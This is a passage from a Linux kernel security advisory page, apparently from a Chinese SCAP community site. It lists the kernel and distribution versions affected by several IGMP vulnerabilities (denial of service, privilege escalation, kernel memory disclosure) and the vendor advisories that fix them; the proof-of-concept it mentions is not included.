+ RedHat Enterprise Linux ES 3
+ RedHat Enterprise Linux WS 3
+ S.u.S.E. Linux Personal 9.0 x86_64
+ S.u.S.E. Linux Personal 9.0
+ SuSE SUSE Linux Enterprise Server 8
Linux kernel 2.4.20
Linux kernel 2.4.19 -pre6
Linux kernel 2.4.19 -pre5
Linux kernel 2.4.19 -pre4
Linux kernel 2.4.19 -pre3
Linux kernel 2.4.19 -pre2
Linux kernel 2.4.19 -pre1
Linux kernel 2.4.19
+ Conectiva Linux 8.0
+ Conectiva Linux Enterprise Edition 1.0
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.0
+ S.u.S.E. Linux 8.1
+ Slackware Linux -current
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
Linux kernel 2.4.18 pre-8
Linux kernel 2.4.18 pre-7
Linux kernel 2.4.18 pre-6
Linux kernel 2.4.18 pre-5
Linux kernel 2.4.18 pre-4
Linux kernel 2.4.18 pre-3
Linux kernel 2.4.18 pre-2
Linux kernel 2.4.18 pre-1
Linux kernel 2.4.18 x86
Linux kernel 2.4.18
+ Astaro Security Linux 2.0 23
+ Astaro Security Linux 2.0 16
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1 IA64
+ RedHat Advanced Workstation for the Itanium Processor 2.1
+ RedHat Linux 8.0
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Firewall on CD
+ S.u.S.E. Linux Office Server
+ S.u.S.E. Linux Openexchange Server
+ S.u.S.E. Linux Personal 8.2
+ S.u.S.E. SuSE eMail Server 3.1
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 8
+ SuSE SUSE Linux Enterprise Server 7
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
Linux kernel 2.4.17
Linux kernel 2.4.16
Linux kernel 2.4.15
Linux kernel 2.4.14
Linux kernel 2.4.13
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Workstation 3.1.1
Linux kernel 2.4.12
+ Conectiva Linux 7.0
Linux kernel 2.4.11
Linux kernel 2.4.10
Linux kernel 2.4.9
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
Linux kernel 2.4.8
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.7
+ RedHat Linux 7.2
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
Linux kernel 2.4.6
Linux kernel 2.4.5
+ Slackware Linux 8.0
Linux kernel 2.4.4
+ S.u.S.E. Linux 7.2
Linux kernel 2.4.3
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
Linux kernel 2.4.2
Linux kernel 2.4.1
Linux kernel 2.4 .0-test9
Linux kernel 2.4 .0-test8
Linux kernel 2.4 .0-test7
Linux kernel 2.4 .0-test6
Linux kernel 2.4 .0-test5
Linux kernel 2.4 .0-test4
Linux kernel 2.4 .0-test3
Linux kernel 2.4 .0-test2
Linux kernel 2.4 .0-test12
Linux kernel 2.4 .0-test11
Linux kernel 2.4 .0-test10
Linux kernel 2.4 .0-test1
Linux kernel 2.4
Conectiva Linux 10.0
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX

- 漏洞讨论

Linux kernel IGMP functionality is reported prone to multiple vulnerabilities. These issues can allow local attackers to carry out denial of service and privilege escalation attacks. Remote attackers may also cause denial of service conditions in vulnerable computers.

The first issue exists in the 'ip_mc_source()' function and may allow local attackers to cause a denial of service condition or gain elevated privileges.

The second issue is related to the first issue and may allow an attacker to disclose sensitive kernel memory.

The third vulnerability exists in the IGMP/IP networking module and may allow remote attackers to cause a denial of service condition in a vulnerable computer.

- 漏洞利用

The following proof of concept is available:

- 解决方案

Conectiva has released a security advisory (CLA-2005:930) and fixes to address this and other issues. Please see the referenced advisory for further information regarding obtaining and applying appropriate updates.

The Fedora Legacy project has released advisory FLSA:2336 to address these issues for Red Hat Fedora Core 1, Red Hat Linux 7.3 and 9. Please see the referenced advisory for further information.

Ubuntu Linux has released advisory USN-38-1 along with fixes to address this, and other issues. Please see the referenced advisory for further information.

Trustix Linux has made an advisory available dealing with this and other issues. Please see the referenced advisory for more information.

SuSE Linux has released an advisory (SUSE-SA:2004:044) along with fixes dealing with this and other issues. Please see the referenced advisory more information.

SuSE Linux has reported that the fixes they released for SuSE Linux 9.2 caused computers that had applied them to fail to boot. This issue is apparently due caused by a script that is no longer creating the vmlinuz and initrd symlinks, which are required for successful booting. The offending fixes have been removed. The BID will be updated as more fixes are released.

Red Hat has released advisory RHSA-2004:689-06 and fixes to address this issue on Red Hat Linux Enterprise platforms. Customers who are affected by this issue are advised to apply the appropriate updates. Customers subscribed to the Red Hat Network may apply the appropriate fixes using the Red Hat Update Agent (up2date). Please see referenced advisory for additional information.

SuSE Linux has reported additional problems with fixes they released for SuSE Linux 9.2. Please see the referenced SuSE advisory SUSE-SA:2004:044 for more information.

Red Hat has released advisories FEDORA-2004-581, and FEDORA-2004-582 to address this issue in Fedora Core 2, and 3 respectively. Please see the referenced advisories for further information.

Avaya has released an advisory regarding this issue. They report that fixes will be released in the future. Please see the referenced Web advisory for more information.

MandrakeSoft has issued fixes in advisory MDKSA-2005:022. See reference section.

Red Hat has released advisory RHSA-2005:092-14 to address various issues in the kernel. Please see the advisory in Web references for more information.

TurboLinux has released Turbolinux Security Announcement 28/Feb/2005 dealing with this and other issues. Please see the referenced advisory for more information.


Linux kernel 2.4.18

Linux kernel 2.4.19

Linux kernel 2.4.21

Linux kernel 2.4.22

Linux kernel 2.4.25

Linux kernel 2.4.27

Linux kernel 2.4.28

Linux kernel 2.4.5

Linux kernel 2.4.9

Linux kernel 2.6

Linux kernel 2.6.4

Linux kernel 2.6.8 rc1

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站